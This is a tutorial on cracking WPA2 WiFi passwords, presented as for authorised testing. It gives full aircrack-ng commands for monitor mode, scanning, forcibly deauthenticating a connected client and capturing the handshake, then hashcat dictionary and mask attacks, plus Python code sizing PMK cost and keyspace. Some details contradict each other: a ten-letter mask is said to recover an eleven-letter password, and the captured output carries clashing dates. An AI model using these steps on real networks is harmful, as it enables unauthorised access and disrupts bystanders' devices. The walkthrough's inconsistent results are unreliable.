How to Hack WiFi Passwords in 10 minutes using Hashcat


In today's digital era, the security of wireless networks is paramount. One of the tools that security professionals use to test the strength of a network is Hashcat. In this guide, we'll dive deep into how to employ Hashcat for cracking WiFi passwords within just 10 minutes. Hashcat isn't just a regular password cracker; it leverages the power of your GPU and offers versatile ways to attack hashed passwords. Dictionary attacks, the most common method, rely heavily on files packed with likely password candidates, while brute-force attacks enumerate combinations from a pattern. Let's unravel the power of Hashcat and understand how it stands out in the world of ethical hacking.

Disclaimer for "How to Hack WiFi Passwords in 10 minutes using Hashcat":

This article is intended for educational purposes only. Tampering with WiFi networks and other unauthorized activities without prior explicit consent can be illegal in many countries. The author, publisher, and associated entities are not responsible for any misuse of the information provided in this article. Always seek permission from network owners prior to conducting any testing. It's essential to understand the implications and responsibilities of ethical hacking. Use this information responsibly and ethically.

Setting Up Monitor Mode

To begin with, we must transition our wireless card into monitor mode. This is achieved by executing the command below:

airmon-ng start wlan0

For the sake of clarity, I'll assume that the name of your wireless interface is 'wlan0'. However, ensure you replace it with the appropriate name if it's different. The command 'iwconfig' can assist in identifying the precise wireless interface name.

Identifying Your Target

Initiate a scan for nearby wireless routers employing the command:

airodump-ng wlan0

CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 28:EF:01:34:64:92  -29       19        1    0   6  54e  WPA2 CCMP   PSK  Linksys
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  SkyNet
 28:EF:01:34:64:91  -29       19        1    0   1  54e  WPA2 CCMP   PSK  TP-LINK
 28:EF:01:35:39:87  -42       17        0    0  11  54e  WPA2 CCMP   PSK  Orange-Net

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57    0 - 1      0        1

You'll be presented with a data table that provides details of all the WiFi routers within your vicinity.

From the given demo data, I'll opt to decipher the password for my own network, dubbed “SkyNet”. I'll need the MAC address (BSSID) and channel pertaining to this network. 

In a fresh terminal window, type:

airodump-ng --bssid 28:EF:01:35:34:85 -c 6 --write wpa wlan0

`--write wpa` sets the prefix of the output files. airodump-ng numbers its captures, so this run produces `wpa-01.cap`, which is where the 4-way handshake will be recorded.

Using the `ls` command, you can confirm the file exists. It's crucial, as this file will later be converted into a distinct format to facilitate password cracking.

Capture a WPA/WPA2 Handshake

WPA and WPA2, by design, use a 4-way handshake to affirm device connections to the network. To capture this handshake, it's essential for the client to authenticate with the Access Point (AP). 

If a device is already authenticated, it can be de-authenticated. Upon doing so, the device will attempt to re-authenticate automatically. During this process, the 4-way handshake can be captured. Initiate another terminal and input:

aireplay-ng -0 100 -a 28:EF:01:35:34:85 -c 28:EF:01:23:46:68 wlan0

Here:

- `-0` implies deauthentication.

- `100` refers to the quantity of deauth packets.

- `-a 28:EF:01:35:34:85` is the MAC address of the access point.

- `-c 28:EF:01:23:46:68` is the client’s MAC address being deauthenticated.

CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 28:EF:01:35:34:85   39 100       51        0    0   6  54  WPA2 CCMP   PSK  SkyNet

 BSSID              STATION            PWR  Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57    0 - 1      0        1

From the presented information, particularly note “WPA handshake: 28:EF:01:35:34:85” situated in the top right. This signifies that the handshake has been successfully captured by `airodump-ng`.

Transitioning the .cap File to .hc22000 Format

Prior to attempting a password crack, the `.cap` file (specifically `wpa-01.cap`) must be converted to hashcat's `.hc22000` format, the one consumed by the `-m 22000` mode used below (the older `.hccapx` format belongs to the deprecated mode 2500). An expedient method involves uploading the `.cap` file to Hashcat's online converter, which returns the `.hc22000` file.

Cracking the WPA/WPA2 Handshake with Hashcat

Hashcat boasts a high degree of versatility, so let’s delve into two prevalent attack techniques:

1. Dictionary Attack: This type of attack leverages a predefined list or dictionary of potential passwords to attempt authentication. The success of the attack largely depends on the comprehensiveness of the dictionary used.

2. Brute-Force Attack: A more time-consuming approach, this involves trying all possible password combinations until the correct one is found. Its success is guaranteed, provided the search space covers the password, but it can be time-intensive depending on password length and complexity.

With the proper tools and techniques, it becomes feasible to decrypt a network's password, underscoring the importance of robust security measures. Always use such knowledge ethically and within legal bounds.


Dictionary Attack Approach

To effectively employ hashcat for dictionary-based attacks, a wordlist (essentially a compilation of popular passwords in a large text file) is necessary. One of the renowned wordlists that many pen-testers opt for is `rockyou.txt`, a reservoir of commonly employed passwords. For users of Kali Linux, the wordlist can typically be located under `/usr/share/wordlists`, where it ships compressed as `rockyou.txt.gz` and must be decompressed before use.

To initiate the cracking procedure, execute the following command:

hashcat -m 22000 wpa-01.hc22000 rockyou.txt

Here, hashcat is launched in mode `22000`, its hash mode for WPA-PBKDF2-PMKID+EAPOL material (WPA/WPA2 handshakes). The file intended for cracking is denoted as `wpa-01.hc22000`, while `rockyou.txt` serves as the wordlist.
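To see what mode 22000 actually has to compute for every candidate drawn from the wordlist, here is an added example (my code, not the post's or hashcat's) that derives the WPA/WPA2-Personal Pairwise Master Key exactly as IEEE 802.11 specifies it: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 32 bytes of output. The `"password"` / `"IEEE"` pair is the test vector published in the standard's annex; the passphrase length and character rules are the standard's as well.

```python
"""WPA/WPA2-Personal PMK derivation: the per-candidate cost behind hashcat mode 22000.

Added example, not code from the post. Derives the Pairwise Master Key the way
IEEE 802.11 defines it so the cost of a single guess (4096 PBKDF2 rounds) is
visible. The ("password", "IEEE") test vector is the one from the standard's annex.
"""
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11 for WPA/WPA2-Personal
PMK_LENGTH = 32            # bytes of derived key
SHA1_OUTPUT = 20           # bytes produced per PBKDF2 output block


def is_valid_psk_passphrase(passphrase: str) -> bool:
    """802.11 passphrases are 8 to 63 printable ASCII characters (0x20..0x7E)."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    if not is_valid_psk_passphrase(passphrase):
        raise ValueError("passphrase must be 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        dklen=PMK_LENGTH,
    )


def hmac_calls_per_candidate() -> int:
    """HMAC-SHA1 invocations PBKDF2 performs for one candidate passphrase.

    32 bytes of output need ceil(32 / 20) = 2 blocks, each iterated 4096 times,
    so every guess costs 8192 HMACs; an NTLM guess costs a single MD4.
    """
    blocks = -(-PMK_LENGTH // SHA1_OUTPUT)
    return blocks * PBKDF2_ITERATIONS


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")
    print("PMK for passphrase 'password' on SSID 'IEEE':", pmk.hex())
    print("HMAC-SHA1 calls per guess:", hmac_calls_per_candidate())
```

Two points fall out of this. The SSID is the salt, so the same passphrase yields a different PMK on every network and any precomputation has to be repeated per SSID; a non-default SSID therefore costs an attacker something. And the 8192 HMAC invocations per guess, against one MD4 per NTLM guess, are why WPA2 hash rates are orders of magnitude lower than the NTLM figures people are used to quoting.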

The end result? The password is successfully deciphered to be “justletmein”.

Brute-Force Assault Strategy

Brute-Force, by design, exhaustively tests every conceivable combination, leading to an exponential increase in potential combinations in tandem with the length of the password. To commence a brute force attack, utilize:


hashcat -m 22000 -a 3 wpa-01.hc22000 ?l?l?l?l?l?l?l?l?l?l

Here, `-a 3` denotes the adoption of a brute force mode, while `wpa-01.hc22000` is the converted `.cap` file, and the sequence of `?l` indicates the presumption that the password is constituted of lowercase letters.

Hashcat permits utilization of these charsets:

- `?l` = abcdefghijklmnopqrstuvwxyz

- `?u` = ABCDEFGHIJKLMNOPQRSTUVWXYZ

- `?d` = 0123456789

- `?h` = 0123456789abcdef

- `?H` = 0123456789ABCDEF

- `?s` = space and !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~


Given a password like 87654321, a custom mask such as `?d?d?d?d?d?d?d?d` could be employed.
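To size a passphrase policy against the mask attack just described, here is an added example (my code, not the post's or hashcat's) that computes the keyspace of a hashcat mask from the built-in charsets listed above, plus `?a` (the union of `?l?u?d?s`, 95 characters), literal characters, and `??` for a literal question mark, and converts it into a worst-case time at a given guess rate. The rate is a parameter; the 1 MH/s used in the demo at the bottom is an assumed placeholder, not a measured figure.

```python
"""Keyspace and crack-time estimate for a hashcat mask.

Added example, not code from the post. Handles hashcat's built-in charsets
(?l ?u ?d ?h ?H ?s ?a), literal characters in a mask, and "??" as a literal
question mark. The guess rate is an input; the value in the demo below is an
assumed placeholder.
"""
import string

BUILTIN_CHARSETS = {
    "l": string.ascii_lowercase,                       # 26
    "u": string.ascii_uppercase,                       # 26
    "d": string.digits,                                # 10
    "h": "0123456789abcdef",                           # 16
    "H": "0123456789ABCDEF",                           # 16
    "s": " " + string.punctuation,                     # 33: space plus the 32 ASCII symbols
    "a": string.ascii_letters + string.digits + " " + string.punctuation,  # 95 = ?l?u?d?s
}


def expand_mask(mask: str) -> list:
    """Return one charset string per password position."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            positions.append(mask[i])          # literal character: keyspace 1
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        selector = mask[i + 1]
        if selector == "?":
            positions.append("?")              # "??" is a literal question mark
        elif selector in BUILTIN_CHARSETS:
            positions.append(BUILTIN_CHARSETS[selector])
        else:
            raise ValueError(f"unknown charset ?{selector}")
        i += 2
    return positions


def mask_keyspace(mask: str) -> int:
    """Number of candidates the mask enumerates: product of the charset sizes."""
    total = 1
    for charset in expand_mask(mask):
        total *= len(charset)
    return total


def seconds_to_exhaust(keyspace: int, guesses_per_second: float) -> float:
    """Worst case: every candidate tried. The expected time is half of this."""
    return keyspace / guesses_per_second


def human_duration(seconds: float) -> str:
    """Render seconds in the largest unit that fits, one decimal place."""
    for name, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    ASSUMED_RATE = 1_000_000   # guesses per second; placeholder, not a benchmark
    for mask in ("?l?l?l?l?l?l?l?l?l?l", "?d?d?d?d?d?d?d?d", "?a?a?a?a?a?a?a?a?a?a?a?a"):
        ks = mask_keyspace(mask)
        print(f"{mask:28} {ks:>28,d} candidates  "
              f"{human_duration(seconds_to_exhaust(ks, ASSUMED_RATE))} worst case")
```

At the placeholder rate, the post's eight-digit mask is exhausted in under two minutes, the ten-lowercase mask takes about four and a half years, and twelve `?a` positions run to a number of years with sixteen digits. Length and charset, not the cracker's GPU count, are what decide whether a brute-force run finishes, which is the argument for long passphrases drawn from the full printable set.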

In this demonstration, a mask of lowercase letters (`?l`) was used, and the password was again recovered as "justletmein".

In Conclusion

This tutorial has furnished you with insights on deciphering WPA2 passwords through tools like Hashcat. It's imperative to emphasize that such endeavors should solely be conducted in environments where authorization is explicit.

Your feedback and queries are much valued. Feel free to share your thoughts in the comments.

Many thanks for your time and attention!

1 Comment

  1. Not realistic... I have hashcat with 3 Nvidia Tesla A100 and I get a hash rate of 4391.8mh/s.
    To compare, with NTLM I have a hash rate of 480.3 GH/s.
    For WPA2-PSK, brute force is not realistic; if you find the password, you are lucky.